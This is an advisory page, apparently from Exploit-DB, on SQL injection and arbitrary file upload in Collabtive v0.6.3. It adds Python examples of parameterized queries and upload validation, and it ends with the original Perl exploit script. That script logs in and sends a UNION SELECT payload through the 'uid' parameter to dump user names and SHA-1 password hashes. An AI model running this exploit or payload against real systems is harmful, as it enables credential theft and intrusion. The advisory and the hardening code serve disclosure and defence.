Vendor: Collabtive
By: DNX
CVSS: 7.5 (HIGH)
Vulnerability Types: Arbitrary File Upload, SQL Injection
CWE: 89, 352
Product Name: Collabtive
Affected Version From: Collabtive v0.6.3
Affected Version To: Collabtive v0.6.3
Patch Exists: NO
Related CWE:
CPE: a:collabtive_project:collabtive:0.6.3
Metasploit:
Other Scripts:
Platforms Tested:
2010

Collabtive v0.6.3 Multiple Vulnerabilities

Collabtive v0.6.3 is vulnerable to SQL injection because it fails to sanitize user-supplied input to the 'uid' parameter of the 'managechat.php' script. An attacker can exploit this vulnerability to execute arbitrary SQL code against the underlying database. The application is also vulnerable to arbitrary file upload, allowing an attacker to upload malicious files to the server. This vulnerability was discovered and reported by DNX. Passwords in the database are stored as SHA-1 hashes.
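The query quoted later in the advisory pastes the 'uid' value straight into an IN(...) list, which is exactly why a value such as "0) union select ... /*" becomes part of the SQL. The following Python example (added here, not part of the advisory or of Collabtive) rebuilds that pattern against an in-memory SQLite database and places the hardened form beside it: the parameter is first checked against an integer allowlist and then bound as a query parameter. The table layout is an assumption constructed for the example (seven chat columns so that the advisory's seven-column UNION lines up; placeholder strings stand in for the SHA-1 hashes).

```python
import re
import sqlite3

# Constructed stand-in for the two tables the advisory's query touches. The column
# layout is an assumption for this example, not Collabtive's real schema; user.pass
# holds placeholder strings where the application would hold SHA-1 hashes.
SCHEMA = """
CREATE TABLE user (ID INTEGER, name TEXT, pass TEXT);
CREATE TABLE chat (ID INTEGER, ufrom_id INTEGER, userto_id INTEGER,
                   message TEXT, time INTEGER, readstat INTEGER, sys INTEGER);
INSERT INTO user VALUES (1, 'alice', 'PLACEHOLDER_SHA1_A');
INSERT INTO user VALUES (2, 'bob',   'PLACEHOLDER_SHA1_B');
INSERT INTO chat VALUES (1, 1, 2, 'hi bob',   100, 0, 0);
INSERT INTO chat VALUES (2, 2, 1, 'hi alice', 101, 0, 0);
"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def pull_chat_vulnerable(conn, userid, uid, start):
    """Mirrors the string-built query from managechat.php: values pasted into SQL."""
    sql = (f"SELECT * FROM chat WHERE ufrom_id IN({userid},{uid}) "
           f"AND userto_id IN({userid},{uid}) AND time > {start} ORDER BY time ASC")
    return conn.execute(sql).fetchall()


# A user id is a short decimal integer and nothing else.
UID_RE = re.compile(r"[0-9]{1,10}")


def pull_chat_hardened(conn, userid, uid, start):
    """Allowlist the parameter's shape, then bind it; the value can never become SQL."""
    if not isinstance(uid, str) or not UID_RE.fullmatch(uid):
        raise ValueError("uid must be a decimal integer")
    sql = ("SELECT * FROM chat WHERE ufrom_id IN(?,?) AND userto_id IN(?,?) "
           "AND time > ? ORDER BY time ASC")
    params = (userid, int(uid), userid, int(uid), start)
    return conn.execute(sql, params).fetchall()


# The advisory's own payload, used only to show what each code path does with it.
ADVISORY_PAYLOAD = "0) union select 1,2,name,4,5,6,pass from user/*"


def leaks_password_hashes(rows):
    """True if any cell of the result set carries a value from user.pass."""
    return any("PLACEHOLDER_SHA1" in str(cell) for row in rows for cell in row)


def demo():
    conn = build_db()
    leaked = pull_chat_vulnerable(conn, 1, ADVISORY_PAYLOAD, 0)
    try:
        pull_chat_hardened(conn, 1, ADVISORY_PAYLOAD, 0)
        rejected = False
    except ValueError:
        rejected = True
    normal = pull_chat_hardened(conn, 1, "2", 0)
    return {"vulnerable_leaks": leaks_password_hashes(leaked),
            "hardened_rejects": rejected,
            "hardened_rows": len(normal)}


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the vulnerable path returning rows that contain user.pass values, while the hardened path refuses the payload before any SQL is built and still returns the two legitimate chat rows for uid "2". The allowlist check is deliberately kept even though the bound parameter alone would be safe: rejecting malformed input at the edge gives you a clean log event to alert on, and binding gives you the guarantee.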

Mitigation:

To mitigate the SQL injection vulnerability, it is recommended to implement proper input validation and parameterized queries. To mitigate the arbitrary file upload vulnerability, it is recommended to implement file type validation and restrict file uploads to trusted locations. It is also recommended to keep the software up to date with the latest patches and security updates.
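For the upload side of the mitigation, the example below (added here, not code from the advisory or from Collabtive) shows the checks a practitioner would expect: the client-supplied name is reduced to its last path component, the extension must be on an allowlist, the leading bytes must match the type that extension claims, an upper size bound is enforced, and the file is written under a random server-chosen name into a directory that is assumed to live outside the web root. The allowlist, magic bytes and size limit are constructed for the example; a deployment tunes them to what the application needs.

```python
import os
import pathlib
import secrets
import tempfile

# Allowlisted extensions and the leading bytes each must start with (constructed
# for this example; extend only with types the application genuinely needs).
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".pdf": (b"%PDF-",),
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # assumed limit for the example


class UploadRejected(ValueError):
    pass


def validate_upload(client_filename, data):
    """Return the sanctioned extension for this upload, or raise UploadRejected."""
    if not data or len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("empty or oversized upload")
    # Keep only the final path component so "../../x.png" cannot steer the write.
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = pathlib.PurePosixPath(base).suffix.lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the claimed type")
    return ext


def is_accepted(client_filename, data):
    """Boolean wrapper around validate_upload for callers that only need a verdict."""
    try:
        validate_upload(client_filename, data)
        return True
    except UploadRejected:
        return False


def store_upload(client_filename, data, upload_dir):
    """Write a validated upload under a random name inside upload_dir.

    upload_dir is assumed to sit outside the web root (or to be served with script
    execution disabled), so a stored file is only ever data, never code.
    """
    ext = validate_upload(client_filename, data)
    dest_dir = pathlib.Path(upload_dir).resolve()
    dest = (dest_dir / (secrets.token_hex(16) + ext)).resolve()
    # The random name contains none of the client's bytes; check containment anyway.
    if dest.parent != dest_dir:
        raise UploadRejected("destination escaped the upload directory")
    dest.write_bytes(data)
    return dest


def demo():
    """Exercise the checks with constructed inputs and report what happened."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    with tempfile.TemporaryDirectory() as tmp:
        stored = store_upload("../../etc/passwd.png", png, tmp)
        return {
            "stored_inside_dir": stored.parent == pathlib.Path(tmp).resolve(),
            "stored_ext": stored.suffix,
            "php_rejected": not is_accepted("shell.php", b"<?php echo 1;"),
            "renamed_php_rejected": not is_accepted("shell.png", b"<?php echo 1;"),
            "png_accepted": is_accepted("logo.png", png),
        }


if __name__ == "__main__":
    print(demo())
```

The random server-side name is the part that closes the classic double-extension trick: whatever the client called the file, only the allowlisted suffix survives, and the web server never sees a name it could map to a script handler. Storing outside the web root (or with execution disabled for the directory) is the second, independent control, so a content check that is fooled by a polyglot file still does not yield code execution.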
Source

Exploit-DB raw data:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;

#                           \#'#/
#                           (-.-)
#    ------------------oOO---(_)---OOo-----------------
#    |          __             __                     |
#    |    _____/ /_____ ______/ /_  __  ______ ______ |
#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
#    | Security Research Division      /____/ 2o1o    |
#    --------------------------------------------------
#    |   Collabtive v0.6.3 Multiple Vulnerabilities   |
#    --------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: http://starbugs.host.sk
# [!] Vendor........: http://collabtive.o-dyn.de
# [!] Detected......: 04.06.2010
# [!] Reported......: 05.06.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Collabtive is a web-based project management application.
#                     The project started in November 2007. It is open-source
#                     software and offers an alternative to proprietary
#                     tools such as Basecamp. Collabtive is written in PHP.
#
#                     Collabtive is developed by a professional team.
#
# [!] Requirements..: Account needed
#
# [!] Bug...........: $_GET['uid'] in managechat.php near line 64
#
#                     12: $userto_id = getArrayVal($_GET, "uid");
#
#                     64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");
#
#                     The password is encoded with sha1.
#
# [!] Bug...........: The arbitrary file upload discovered by USH is still present.
#                     See http://www.milw0rm.com/exploits/7076 for more details.
#

if(!$ARGV[5])
{
  print "\n                       \\#'#/                   ";
  print "\n                       (-.-)                    ";
  print "\n   ---------------oOO---(_)---OOo---------------";
  print "\n   |  Collabtive v0.6.3 SQL Injection Exploit  |";
  print "\n   |               coded by DNX                |";
  print "\n   ---------------------------------------------";
  print "\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";
  print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";
  print "\n[!] Options:";
  print "\n       -user [text]    Username";
  print "\n       -pass [text]    Password";
  print "\n       -p [ip:port]    Proxy support";
  print "\n";
  exit;
}

my %options = ();
GetOptions(\%options, "user=s", "pass=s", "p=s");
my $ua      = LWP::UserAgent->new();
my $cookie  = HTTP::Cookies->new();
my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $target  = "http://".$host.$path;
my $user    = "";
my $pass    = "";

if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
if($options{"user"}) { $user = $options{"user"}; }
if($options{"pass"}) { $pass = $options{"pass"}; }

print "[!] Exploiting...\n\n";

exploit();

print "\n[!] Done\n";

sub exploit
{
  ##############
  # make login #
  ##############
  
  my $url = $target."manageuser.php?action=login";
  my $res = $ua->post($url, [username => $user, pass => $pass]);
  $cookie->extract_cookies($res);
  $ua->cookie_jar($cookie);
  
  ############################
  # get users with passwords #
  ############################
  
  $url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
  $res = $ua->get($url);
  my $content = $res->content;
  
  my @c = split(/<br \/>/, $content);
  foreach (@c)
  {
    if($_ =~ /<b>(.*?):<\/b> (.*)/)
    {
      print $1.":".$2."\n";
    }
  }
}